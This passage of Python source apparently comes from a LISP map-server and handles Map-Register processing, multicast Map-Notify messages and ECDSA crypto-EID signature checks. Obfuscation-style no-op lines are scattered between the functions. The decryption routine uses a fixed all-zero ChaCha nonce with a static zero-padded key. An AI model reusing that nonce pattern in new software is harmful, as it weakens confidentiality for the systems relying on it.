    return
if 96 - 96: oO0o
if 44 - 44: OoooooooOO / iII111i * Oo0Ooo % OoOoOO00 . oO0o
if 97 - 97: iIii1I11I1II1 / ooOoO0o
if 16 - 16: Oo0Ooo % IiII
if 48 - 48: I1IiiI . I1Ii111 . o0oOOo0O0Ooo
if 72 - 72: Ii1I * OoO0O00 / OoO0O00
if 39 - 39: oO0o
if 49 - 49: I1IiiI * I1Ii111 . I1IiiI - II111iiii
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
    """
    Send an unsolicited Map-Notify for multicast entry 'site_eid' to an
    ITR or RTR 'xtr' and queue it for retransmission until acked.
    """
    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = 1
    map_notify.nonce = lisp_get_control_nonce()
    map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
    map_notify.etr.copy_address(xtr)
    map_notify.etr_port = LISP_CTRL_PORT
    map_notify.eid_list = eid_list
    key = map_notify.nonce_key

    #
    # Supersede stale queued notifies, then suppress a duplicate if one
    # is already pending for this nonce/xTR.
    # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
    #
    lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
    if (key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue[key]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format(map_notify.nonce, red(xtr.print_address_no_iid(), False)))
        return

    lisp_map_notify_queue[key] = map_notify

    #
    # When RTRs are in the RLOC-set, include only RTR RLOCs — unless the
    # target is itself one of those RTRs.
    #
    rtrs = site_eid.rtrs_in_rloc_set()
    if (rtrs):
        if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs = False

    #
    # Build the EID-record, counting only the RLOCs we will include.
    #
    eid_record = lisp_eid_record()
    eid_record.record_ttl = 1440
    eid_record.eid.copy_address(site_eid.eid)
    eid_record.group.copy_address(site_eid.group)
    eid_record.rloc_count = 0
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs ^ rloc_entry.is_rtr()): continue
        eid_record.rloc_count += 1
    packet = eid_record.encode()

    map_notify.print_notify()
    eid_record.print_record("  ", False)

    #
    # Append the matching RLOC-records.
    #
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs ^ rloc_entry.is_rtr()): continue
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    #
    # Encode the Map-Notify (no auth key for multicast notifies).
    #
    packet = map_notify.encode(packet, "")
    if (packet == None): return

    lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)

    #
    # Arm the retransmit timer in case no Map-Notify-Ack arrives.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
if 57 - 57: o0oOOo0O0Ooo
if 37 - 37: iII111i * o0oOOo0O0Ooo
if 23 - 23: ooOoO0o + OoooooooOO * iII111i . I11i
if 2 - 2: iIii1I11I1II1 * I1ii11iIi11i - OoooooooOO
if 93 - 93: iII111i % ooOoO0o * Oo0Ooo
if 34 - 34: O0 * oO0o
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    """
    For each (S,G) tuple in 'rle_list', determine which ITRs or RTRs
    need an unsolicited multicast Map-Notify and send one to each.
    """
    null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    for sg in rle_list:
        sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
        if (sg_site_eid == None): continue

        #
        # When the merged registration has no RLOCs, fall back to the
        # RTR RLOCs found in the individual registrations (dedupe by
        # printed address).
        #
        registered = sg_site_eid.registered_rlocs
        if (len(registered) == 0):
            rtr_by_addr = {}
            for individual in sg_site_eid.individual_registrations.values():
                for rloc_entry in individual.registered_rlocs:
                    if (rloc_entry.is_rtr() == False): continue
                    rtr_by_addr[rloc_entry.rloc.print_address()] = rloc_entry

            # Py3 fix: dict.values() is a view there and is indexed with
            # [0] below — materialize a list (no-op on Python 2).
            registered = list(rtr_by_addr.values())

        #
        # Choose the notify targets. For the (0.0.0.0/0, G) entry,
        # notify the already-known RLE nodes; otherwise notify the RTRs
        # in the registered RLOC-set.
        #
        notify_addrs = []
        notify_rtrs = False
        if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
            names = []
            rle_nodes = [] if len(registered) == 0 else registered[0].rle.rle_nodes

            for rle_node in rle_nodes:
                notify_addrs.append(rle_node.address)
                names.append(rle_node.address.print_address_no_iid())

            lprint("Notify existing RLE-nodes {}".format(names))
        else:
            for rloc_entry in registered:
                if (rloc_entry.is_rtr()): notify_addrs.append(rloc_entry.rloc)

        #
        # No RTRs found: fall back to the ITRs registered for (S,*).
        #
        notify_rtrs = (len(notify_addrs) != 0)
        if (notify_rtrs == False):
            site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
            if (site_eid == None): continue

            for rloc_entry in site_eid.registered_rlocs:
                if (rloc_entry.rloc.is_null()): continue
                notify_addrs.append(rloc_entry.rloc)

        if (len(notify_addrs) == 0):
            lprint("No ITRs or RTRs found for {}, Map-Notify suppressed".format(green(sg_site_eid.print_eid_tuple(), False)))

            continue

        #
        # Send one Map-Notify per target, pacing sends slightly so we
        # do not burst the control socket.
        #
        for xtr in notify_addrs:
            lprint("Build Map-Notify to {}TR {} for {}".format("R" if notify_rtrs else "x", red(xtr.print_address_no_iid(), False),
                green(sg_site_eid.print_eid_tuple(), False)))

            eids = [sg_site_eid.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, eids, xtr)
            time.sleep(.001)
    return
if 70 - 70: i11iIiiIii % Ii1I * IiII / IiII . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i
if 58 - 58: i11iIiiIii % Ii1I + Oo0Ooo - OoOoOO00 - i11iIiiIii / O0
if 36 - 36: OOooOOo
if 42 - 42: OOooOOo * ooOoO0o * i11iIiiIii + OoooooooOO . iIii1I11I1II1
if 95 - 95: i1IIi * O0 / II111iiii * OoOoOO00 * I1IiiI
if 38 - 38: OOooOOo - OoOoOO00 / OoO0O00 / o0oOOo0O0Ooo - i11iIiiIii
if 4 - 4: I1IiiI * o0oOOo0O0Ooo - I11i - OoooooooOO . OoooooooOO
def lisp_find_sig_in_rloc_set(packet, rloc_count):
    """
    Walk 'rloc_count' RLOC-records in 'packet' and return the first one
    whose JSON payload contains a "signature" key, or None when no such
    record exists (or the JSON is corrupt).
    """
    for _ in range(rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        json_sig = rloc_record.json
        if (json_sig == None): continue

        try:
            json_sig = json.loads(json_sig.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue

        # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
        if (("signature" in json_sig) == False): continue
        return (rloc_record)

    return (None)
if 58 - 58: I1ii11iIi11i / i11iIiiIii + iII111i + I11i / oO0o
if 8 - 8: I1ii11iIi11i
if 100 - 100: OoooooooOO / I11i - Ii1I
if 11 - 11: OoO0O00
if 20 - 20: Oo0Ooo
if 34 - 34: I1Ii111 % i11iIiiIii / oO0o - i1IIi . o0oOOo0O0Ooo / oO0o
if 68 - 68: I1Ii111 % Ii1I * Oo0Ooo - O0 . IiII
if 1 - 1: I1ii11iIi11i
if 18 - 18: i11iIiiIii % OoO0O00 % OOooOOo . OOooOOo * Ii1I / II111iiii
if 81 - 81: iII111i % IiII / I11i
if 50 - 50: IiII + i1IIi % I1Ii111
if 72 - 72: I1Ii111
if 6 - 6: II111iiii - i1IIi
if 78 - 78: OoOoOO00 - Oo0Ooo * II111iiii % iIii1I11I1II1 . i11iIiiIii % iII111i
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
if 98 - 98: OOooOOo + I1IiiI / IiII / OoooooooOO / OOooOOo
def lisp_get_eid_hash(eid):
    """
    Return the crypto-hash portion of 'eid' as a colon-separated hex
    string when the EID matches a configured prefix in
    lisp_eid_hashes, otherwise None. The hash is the low-order
    (128 - mask_len) bits of the EID address.
    """
    hash_len = None
    for eid_prefix in lisp_eid_hashes:

        #
        # An instance-id of -1 is a wildcard: temporarily adopt the
        # EID's instance-id for the comparison, then restore it.
        #
        iid = eid_prefix.instance_id
        if (iid == -1): eid_prefix.instance_id = eid.instance_id

        matched = eid.is_more_specific(eid_prefix)
        eid_prefix.instance_id = iid
        if (matched):
            hash_len = 128 - eid_prefix.mask_len
            break

    if (hash_len == None): return (None)

    address = eid.address
    eid_hash = ""

    # Portability fixes: "//" keeps integer division on Python 3 (range()
    # needs an int), and "%x" formatting replaces hex(x)[2:-1], which
    # depended on Python-2 longs carrying a trailing "L" — on a plain int
    # that slice strips a real hex digit.
    for _ in range(0, hash_len // 16):
        hex_digits = "%x" % (address & 0xffff)
        eid_hash = hex_digits.zfill(4) + ":" + eid_hash
        address >>= 16

    if (hash_len % 16 != 0):
        hex_digits = "%x" % (address & 0xff)
        eid_hash = hex_digits.zfill(2) + ":" + eid_hash

    # Drop the trailing ":" separator.
    return (eid_hash[0:-1])
if 86 - 86: ooOoO0o . ooOoO0o . OoooooooOO - OoOoOO00 % oO0o
if 81 - 81: Oo0Ooo . OoooooooOO
if 15 - 15: I1Ii111 - I11i * I1IiiI % o0oOOo0O0Ooo
if 75 - 75: oO0o % OoooooooOO % i11iIiiIii . iII111i
if 95 - 95: i11iIiiIii . Ii1I / II111iiii + II111iiii + Ii1I / I11i
if 72 - 72: I1Ii111 . I1Ii111 * O0 + I1ii11iIi11i / Oo0Ooo
if 96 - 96: oO0o . ooOoO0o * Oo0Ooo % ooOoO0o + I1Ii111 + iIii1I11I1II1
if 45 - 45: II111iiii
if 42 - 42: ooOoO0o
if 62 - 62: II111iiii * o0oOOo0O0Ooo . OoO0O00 / II111iiii
if 5 - 5: OoO0O00 + O0 . OoooooooOO + I1IiiI + i1IIi * OOooOOo
def lisp_lookup_public_key(eid):
    """
    Look up the site registration for the crypto-hash of 'eid' and pull
    the "public-key" value out of a registered RLOC's JSON payload.

    Returns [hash_eid, public_key, lookup_succeeded]:
      hash_eid         - distinguished-name EID "hash-<hex>", or None
                         when 'eid' carries no crypto-hash
      public_key       - key string, or None when none is registered
      lookup_succeeded - True when the site-EID lookup found an entry
    """
    iid = eid.instance_id

    #
    # Build the distinguished-name EID "hash-<hex>" under which keys
    # are registered.
    #
    hash_str = lisp_get_eid_hash(eid)
    if (hash_str == None): return ([None, None, False])

    hash_str = "hash-" + hash_str
    hash_eid = lisp_address(LISP_AFI_NAME, hash_str, len(hash_str), iid)
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)

    site_eid = lisp_site_eid_lookup(hash_eid, group, True)
    if (site_eid == None): return ([hash_eid, None, False])

    #
    # Find the first registered RLOC carrying a "public-key" JSON field.
    #
    pubkey = None
    for rloc_entry in site_eid.registered_rlocs:
        json_field = rloc_entry.json
        if (json_field == None): continue
        try:
            json_field = json.loads(json_field.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format(hash_str))

            return ([hash_eid, None, False])

        # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
        if (("public-key" in json_field) == False): continue
        pubkey = json_field["public-key"]
        break

    return ([hash_eid, pubkey, True])
if 38 - 38: I1ii11iIi11i - OoooooooOO + Oo0Ooo
if 74 - 74: i1IIi % ooOoO0o
if 95 - 95: OOooOOo . O0 - OOooOOo
if 5 - 5: OOooOOo % I1Ii111 * II111iiii
if 69 - 69: OoO0O00 . o0oOOo0O0Ooo
if 86 - 86: I1ii11iIi11i
if 51 - 51: O0 % OoO0O00 - I1Ii111
if 82 - 82: OoOoOO00 - OOooOOo . i1IIi / I11i
def lisp_verify_cga_sig(eid, rloc_record):
    """
    Verify the ECDSA signature carried in 'rloc_record' against the
    signature-EID. The public key comes from the registered "hash-"
    site entry for that EID. Returns True when the signature verifies.
    """

    #
    # Determine the signature-EID: either 'eid' itself carries the
    # crypto-hash, or the RLOC-record JSON names one explicitly.
    #
    sig = json.loads(rloc_record.json.json_string)

    if (lisp_get_eid_hash(eid)):
        sig_eid = eid
    # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
    elif ("signature-eid" in sig):
        sig_eid_str = sig["signature-eid"]
        sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
    else:
        lprint("  No signature-eid found in RLOC-record")
        return (False)

    #
    # Look up the public key registered for the hashed EID.
    #
    hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
    if (hash_eid == None):
        eid_str = green(sig_eid.print_address(), False)
        lprint("  Could not parse hash in EID {}".format(eid_str))
        return (False)

    found = "found" if lookup_good else bold("not found", False)
    eid_str = green(hash_eid.print_address(), False)
    lprint("  Lookup for crypto-hashed EID {} {}".format(eid_str, found))
    if (lookup_good == False): return (False)

    if (pubkey == None):
        lprint("  RLOC-record with public-key not found")
        return (False)

    key_str = pubkey[0:8] + "..." + pubkey[-8::]
    lprint("  RLOC-record with public-key '{}' found".format(key_str))

    #
    # Base64-decode the signature; a DER signature has even length.
    #
    sig_str = sig["signature"]
    try:
        sig_bytes = binascii.a2b_base64(sig_str)
    except:
        lprint("  Incorrect padding in signature string")
        return (False)

    sig_len = len(sig_bytes)
    if (sig_len & 1):
        lprint("  Signature length is odd, length {}".format(sig_len))
        return (False)

    #
    # The signed data is the printed signature-EID address.
    #
    sig_data = sig_eid.print_address()

    #
    # Build the verifying key from the base64/PEM public key.
    #
    pubkey = binascii.a2b_base64(pubkey)
    try:
        vkey = ecdsa.VerifyingKey.from_pem(pubkey)
    except:
        bad = bold("Bad public-key", False)
        lprint("  {}, not in PEM format".format(bad))
        return (False)

    #
    # Verify the signature over the signature-EID string; the ecdsa
    # library raises on a bad signature, which we report as False.
    #
    try:
        good = vkey.verify(sig_bytes, sig_data, hashfunc=hashlib.sha256)
    except:
        lprint("  Signature library failed for signature data '{}'".format(sig_data))

        lprint("  Signature used '{}'".format(sig_str))
        return (False)

    return (good)
if 8 - 8: Ii1I
if 28 - 28: iII111i / I1ii11iIi11i - OoOoOO00 * Oo0Ooo + Ii1I * OoOoOO00
if 94 - 94: oO0o
if 95 - 95: ooOoO0o * O0 + OOooOOo
if 11 - 11: i1IIi / OoOoOO00 + OoOoOO00 + I1ii11iIi11i + OOooOOo
if 21 - 21: ooOoO0o
if 28 - 28: OoOoOO00 + OoOoOO00 - OoOoOO00 / ooOoO0o
if 81 - 81: oO0o
if 34 - 34: o0oOOo0O0Ooo * OOooOOo - i1IIi * o0oOOo0O0Ooo * Oo0Ooo
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
def lisp_remove_eid_from_map_notify_queue(eid_list):
    """
    Remove from the global 'lisp_map_notify_queue' any pending Map-Notify
    whose EID-list intersects the supplied 'eid_list'.  Each removed
    entry's retransmit timer is cancelled first.  Returns None.
    """

    #
    # Walk the queue and collect the keys of matching entries.  Use a set:
    # several EIDs in 'eid_list' can match the same queue entry, and
    # popping the same key twice would raise a KeyError.
    #
    queue_keys = set()
    for eid in eid_list:
        for nonce_key in lisp_map_notify_queue:
            map_notify = lisp_map_notify_queue[nonce_key]
            if (eid not in map_notify.eid_list): continue

            queue_keys.add(nonce_key)
            timer = map_notify.retransmit_timer
            if (timer): timer.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".format(
                map_notify.nonce_key, green(eid, False)))
        #endfor
    #endfor

    #
    # Remove entries only after iteration so the dictionary is not mutated
    # while being traversed.
    #
    for nonce_key in queue_keys: lisp_map_notify_queue.pop(nonce_key)
    return
if 70 - 70: OoO0O00
if 42 - 42: OoooooooOO - I1Ii111 + I1ii11iIi11i * iII111i * iII111i / OoO0O00
if 85 - 85: O0 . II111iiii
if 80 - 80: O0 * I11i * I1Ii111
if 89 - 89: Ii1I * OoO0O00 . i1IIi . O0 - IiII - OoOoOO00
if 25 - 25: iII111i + i1IIi
if 64 - 64: IiII % I11i / iIii1I11I1II1
if 66 - 66: Ii1I
def lisp_decrypt_map_register(packet):
    """
    Decrypt a Map-Register when the sender encrypted it.  Returns the
    packet unchanged when the encrypt-bit is clear, the decrypted packet
    on success, or None when no key is configured for the key-id.
    """

    #
    # First 4 bytes carry the LISP header: bit 13 is the encrypt-bit and
    # bits 14-16 the key-id the sender used.
    #
    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    encrypt_bit = (header >> 13) & 0x1
    if (encrypt_bit == 0): return(packet)

    key_id = (header >> 14) & 0x7

    #
    # Look up the configured encryption key.  Narrowed from a bare
    # 'except:' — only a missing key-id (or an unusable key table) means
    # "cannot decrypt"; other exceptions should surface.
    #
    try:
        key = lisp_ms_encryption_keys[key_id]
        key = key.zfill(32)
        iv = "0" * 8
    except (KeyError, TypeError):
        lprint("Cannot decrypt Map-Register with key-id {}".format(key_id))
        return(None)
    #endtry

    decrypt_str = bold("Decrypt", False)
    lprint("{} Map-Register with key-id {}".format(decrypt_str, key_id))

    #
    # ChaCha-decrypt everything after the 4-byte header and splice the
    # cleartext header back on.
    #
    plaintext = chacha.ChaCha(key, iv).decrypt(packet[4::])
    return(packet[0:4] + plaintext)
if 44 - 44: IiII - II111iiii % Ii1I
if 64 - 64: Ii1I % OoO0O00 + OOooOOo % OoOoOO00 + IiII
if 92 - 92: iII111i * Oo0Ooo - OoOoOO00
if 33 - 33: i11iIiiIii - OoOoOO00 . OOooOOo * II111iiii . Ii1I
if 59 - 59: OoOoOO00
if 29 - 29: iII111i - II111iiii * OoooooooOO * OoooooooOO
if 15 - 15: IiII / OOooOOo / iIii1I11I1II1 / OoOoOO00
def lisp_process_map_register(lisp_sockets, packet, source, sport):
    """
    Process a received Map-Register.  For each EID-record: find the
    configured site entry, authenticate, verify crypto-EID signatures when
    present or required, store the registered RLOC-set, and trigger
    Map-Notify messages (to the old RLOC-set, to subscribers, and back to
    the registerer when requested).  Returns None.
    """
    global lisp_registered_count

    #
    # Decrypt the Map-Register if the xTR encrypted it.
    #
    packet = lisp_decrypt_map_register(packet)
    if (packet == None): return

    map_register = lisp_map_register()
    orig_packet, packet = map_register.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Register packet")
        return
    #endif
    map_register.sport = sport

    map_register.print_map_register()

    #
    # Remember whether sha1 or sha2 authentication was used.
    #
    sha1_or_sha2 = True
    if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
        sha1_or_sha2 = True
    #endif
    if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
        sha1_or_sha2 = False
    #endif

    #
    # Process each EID-record in the Map-Register.
    #
    multicast_eids = []
    site = None
    eid_records = packet
    eid_list = []
    record_count = map_register.record_count
    for i in range(record_count):
        eid_record = lisp_eid_record()
        rloc_record = lisp_rloc_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Register packet")
            return
        #endif
        eid_record.print_record("  ", False)

        #
        # Find the site entry for this EID-prefix (longest match first).
        #
        site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
            False)

        match_str = site_eid.print_eid_tuple() if site_eid else None

        #
        # If the matched entry does not accept more-specifics and the
        # record is not an exact match, back up to the ams parent.
        #
        if (site_eid and site_eid.accept_more_specifics == False):
            if (site_eid.eid_record_matches(eid_record) == False):
                parent = site_eid.parent_for_more_specifics
                if (parent): site_eid = parent
            #endif
        #endif

        #
        # Accept-more-specifics: create a dynamic site-EID for this
        # more-specific registration.  Otherwise require an exact match.
        #
        ams = (site_eid and site_eid.accept_more_specifics)
        if (ams):
            ms_site_eid = lisp_site_eid(site_eid.site)
            ms_site_eid.dynamic = True
            ms_site_eid.eid.copy_address(eid_record.eid)
            ms_site_eid.group.copy_address(eid_record.group)
            ms_site_eid.parent_for_more_specifics = site_eid
            ms_site_eid.add_cache()
            ms_site_eid.inherit_from_ams_parent()
            site_eid.more_specific_registrations.append(ms_site_eid)
            site_eid = ms_site_eid
        else:
            site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
                True)
        #endif

        eid_str = eid_record.print_eid_tuple()

        if (site_eid == None):
            not_found = bold("Site not found", False)
            lprint("  {} for EID {}{}".format(not_found, green(eid_str, False),
                ", matched non-ams {}".format(green(match_str, False) if \
                match_str else "")))

            #
            # Skip over this record's RLOC-records and go to next record.
            #
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            #endif
            continue
        #endif

        site = site_eid.site

        if (ams):
            e = site_eid.parent_for_more_specifics.print_eid_tuple()
            lprint("  Found ams {} for site '{}' for registering prefix {}". \
                format(green(e, False), site.site_name, green(eid_str, False)))
        else:
            e = green(site_eid.print_eid_tuple(), False)
            lprint("  Found {} for site '{}' for registering prefix {}". \
                format(e, site.site_name, green(eid_str, False)))
        #endif

        #
        # Reject registrations for sites configured in admin-shutdown.
        #
        if (site.shutdown):
            lprint(("  Rejecting registration for site '{}', configured in " +
                "admin-shutdown state").format(site.site_name))
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            continue
        #endif

        #
        # Authenticate with the site's shared key.  Fall back to key-id 0
        # when the sender's key-id is not configured.  ('in' replaces the
        # Python-2-only dict.has_key with identical semantics.)
        #
        key_id = map_register.key_id
        if (key_id not in site.auth_key): key_id = 0
        password = site.auth_key[key_id]

        auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
            map_register.auth_data, password)
        dynamic = "dynamic " if site_eid.dynamic else ""

        passed = bold("passed" if auth_good else "failed", False)
        key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
            else "bad key-id {}".format(map_register.key_id)
        lprint("  Authentication {} for {}EID-prefix {}, {}".format(passed,
            dynamic, green(eid_str, False), key_id))

        #
        # Verify signature for crypto-EIDs, or when the site requires one.
        #
        sig_good = True
        is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
        if (is_crypto_eid or site_eid.require_signature):
            required = "Required " if site_eid.require_signature else ""
            eid_str = green(eid_str, False)
            sig_rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
            if (sig_rloc == None):
                sig_good = False
                lprint(("  {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}, no signature found").format(required,
                    bold("failed", False), eid_str))
            else:
                sig_good = lisp_verify_cga_sig(eid_record.eid, sig_rloc)
                passed = bold("passed" if sig_good else "failed", False)
                lprint(("  {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}").format(required, passed, eid_str))
            #endif
        #endif

        #
        # On authentication or signature failure, skip this record's
        # RLOC-records and go on to the next EID-record.
        #
        if (auth_good == False or sig_good == False):
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            #endif
            continue
        #endif

        #
        # Merge semantics: keep per-xTR individual registrations under the
        # parent site-EID and merge them together.
        #
        if (map_register.merge_register_requested):
            parent = site_eid
            parent.inconsistent_registration = False

            #
            # A new site-id from the registerer resets the merged state.
            #
            if (site_eid.group.is_null()):
                if (parent.site_id != map_register.site_id):
                    parent.site_id = map_register.site_id
                    parent.registered = False
                    parent.individual_registrations = {}
                    parent.registered_rlocs = []
                    lisp_registered_count -= 1
                #endif
            #endif

            key = source.address + map_register.xtr_id
            if (key in site_eid.individual_registrations):
                site_eid = site_eid.individual_registrations[key]
            else:
                site_eid = lisp_site_eid(site)
                site_eid.eid.copy_address(parent.eid)
                site_eid.group.copy_address(parent.group)
                parent.individual_registrations[key] = site_eid
            #endif
        else:
            site_eid.inconsistent_registration = \
                site_eid.merge_register_requested
        #endif

        site_eid.map_registers_received += 1

        #
        # Ignore a deregistration (TTL 0) from an RLOC that is not in the
        # currently registered RLOC-set.
        #
        bad_source = (site_eid.is_rloc_in_rloc_set(source) == False)
        if (eid_record.record_ttl == 0 and bad_source):
            lprint("  Ignore deregistration request from {}".format(
                red(source.print_address_no_iid(), False)))
            continue
        #endif

        #
        # Save the old RLOC-set and decode the new one from the packet.
        #
        old_rloc_set = site_eid.registered_rlocs
        site_eid.registered_rlocs = []

        start_rloc_records = packet
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            #endif
            rloc_record.print_record("    ")

            #
            # Enforce the site's allowed RLOC-set when one is configured.
            #
            if (len(site.allowed_rlocs) > 0):
                addr_str = rloc_record.rloc.print_address()
                if (addr_str not in site.allowed_rlocs):
                    lprint(("    Reject registration, RLOC {} not " +
                        "configured in allowed RLOC-set").format(
                        red(addr_str, False)))

                    site_eid.registered = False
                    packet = rloc_record.end_of_rlocs(packet,
                        eid_record.rloc_count - j - 1)
                    break
                #endif
            #endif

            #
            # Store the RLOC from the RLOC-record.
            #
            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, source)

            #
            # Only the sending RLOC carries the Map-Notify request flag.
            #
            if (source.is_exact_match(rloc.rloc)):
                rloc.map_notify_requested = map_register.map_notify_requested
            #endif

            site_eid.registered_rlocs.append(rloc)
        #endfor

        rloc_set_changed = \
            (site_eid.do_rloc_sets_match(old_rloc_set) == False)

        #
        # Refreshing registrations must not change the RLOC-set; restore
        # the old set and reject this record.
        #
        if (map_register.map_register_refresh and rloc_set_changed and
            site_eid.registered):
            lprint("  Reject registration, refreshes cannot change RLOC-set")
            site_eid.registered_rlocs = old_rloc_set
            continue
        #endif

        #
        # First registration for this site-EID.
        #
        if (site_eid.registered == False):
            site_eid.first_registered = lisp_get_timestamp()
            lisp_registered_count += 1
        #endif
        site_eid.last_registered = lisp_get_timestamp()
        site_eid.registered = (eid_record.record_ttl != 0)
        site_eid.last_registerer = source

        #
        # Save the Map-Register request flags on the site-EID.
        #
        site_eid.auth_sha1_or_sha2 = sha1_or_sha2
        site_eid.proxy_reply_requested = map_register.proxy_reply_requested
        site_eid.lisp_sec_present = map_register.lisp_sec_present
        site_eid.map_notify_requested = map_register.map_notify_requested
        site_eid.mobile_node_requested = map_register.mobile_node
        site_eid.merge_register_requested = \
            map_register.merge_register_requested
        site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
        if (site_eid.use_register_ttl_requested):
            site_eid.register_ttl = eid_record.store_ttl()
        else:
            site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
        #endif
        site_eid.xtr_id_present = map_register.xtr_id_present
        if (site_eid.xtr_id_present):
            site_eid.xtr_id = map_register.xtr_id
            site_eid.site_id = map_register.site_id
        #endif

        #
        # Merge this individual registration into the parent and send a
        # merged Map-Notify when the xTR asked for one.
        #
        if (map_register.merge_register_requested):
            if (parent.merge_in_site_eid(site_eid)):
                multicast_eids.append([eid_record.eid, eid_record.group])
            #endif
            if (map_register.map_notify_requested):
                lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
                    eid_record)
            #endif
        #endif

        if (rloc_set_changed == False): continue
        if (len(multicast_eids) != 0): continue

        eid_list.append(site_eid.print_eid_tuple())

        #
        # The RLOC-set changed; Map-Notify the old RLOC-set so those xTRs
        # learn about the change.
        #
        eid_record = eid_record.encode()
        eid_record += start_rloc_records
        el = [site_eid.print_eid_tuple()]
        lprint("  Changed RLOC-set, Map-Notifying old RLOC-set")

        for rloc in old_rloc_set:
            if (rloc.map_notify_requested == False): continue
            if (rloc.rloc.is_exact_match(source)): continue
            lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
                LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
                map_register.alg_id, map_register.auth_len, site, False)
        #endfor

        #
        # Notify subscribers of the new RLOC-set.
        #
        lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
    #endfor

    #
    # Queue multicast Map-Notify messages for merged (S,G) entries.
    #
    if (len(multicast_eids) != 0):
        lisp_queue_multicast_map_notify(lisp_sockets, multicast_eids)
    #endif

    #
    # Merged registrations have already been Map-Notified above.
    #
    if (map_register.merge_register_requested): return

    #
    # Send a Map-Notify back to the registerer when requested.
    #
    if (map_register.map_notify_requested and site != None):
        lisp_build_map_notify(lisp_sockets, eid_records, eid_list,
            map_register.record_count, source, sport, map_register.nonce,
            map_register.key_id, map_register.alg_id, map_register.auth_len,
            site, True)
    #endif
    return
if 54 - 54: iII111i - I1Ii111
if 88 - 88: iII111i * OoO0O00 % OoooooooOO / oO0o
if 7 - 7: i1IIi
if 30 - 30: oO0o . i1IIi / I11i
if 23 - 23: i1IIi + oO0o % iII111i - OoO0O00 - i1IIi
if 74 - 74: Ii1I + I11i . OoooooooOO - I1ii11iIi11i
if 2 - 2: oO0o - o0oOOo0O0Ooo
if 80 - 80: i1IIi
if 40 - 40: O0 . ooOoO0o * iII111i . I11i + I1Ii111 % OoO0O00
if 9 - 9: IiII * oO0o - o0oOOo0O0Ooo
def lisp_process_multicast_map_notify(packet, source):
    """
    Process a multicast Map-Notify: for each (S,G) EID-record, update an
    existing map-cache entry (or create one when gleaning is allowed) with
    the TTL and the RLE carried in the RLOC-records.  Returns None.
    """
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return
    #endif

    map_notify.print_notify()
    if (map_notify.record_count == 0): return

